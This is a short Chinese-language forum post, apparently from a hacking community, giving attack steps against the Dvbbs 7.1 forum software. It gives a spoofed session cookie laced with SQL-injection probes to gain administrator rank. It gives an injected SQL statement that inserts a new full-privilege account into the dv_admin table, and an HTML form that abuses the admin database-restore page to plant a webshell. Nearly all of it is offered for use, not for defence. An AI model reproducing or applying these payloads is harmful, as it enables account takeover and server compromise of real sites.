dvbbs 7.1跳過死循環(huán)，按linzi的方法只能是有一個(gè)管理權(quán)限，而只是新手上路的等級(jí)  
如果是sql版，就不好暴庫，事實(shí)上好像只需要抓取SESSION即可，不要登陸任何用戶。  
欺騙時(shí)不要關(guān)閉假死的那個(gè)ie  

這個(gè)是死循環(huán)的SESSION:  
ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ  

加入或替換到可以欺騙的瀏覽器的cookie欄。  
List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ  

然后點(diǎn)任何板塊  
就能發(fā)現(xiàn)，你欺騙的用戶和等級(jí)都是管理員了。  


后臺(tái)管理員可以通過用戶獎(jiǎng)勵(lì)那里加入  

test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--  
dvbbs7.1 sql 后臺(tái)得ｓｈｅｌｌ  

<form action="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore" method="post">  
<p>已上傳文件的位置：<input name="Dbpath" type="text" size="80"></p>  
<p>要復(fù)制到的位置：<input name="backpath" type="text" size="80"></p>  
<p><input type="submit" value="提交"></p>  
</form>  

好像7.1的usercookies只是個(gè)幌子  
根本沒必要  
去掉了也一樣可以使用  

搞笑  

最新評(píng)論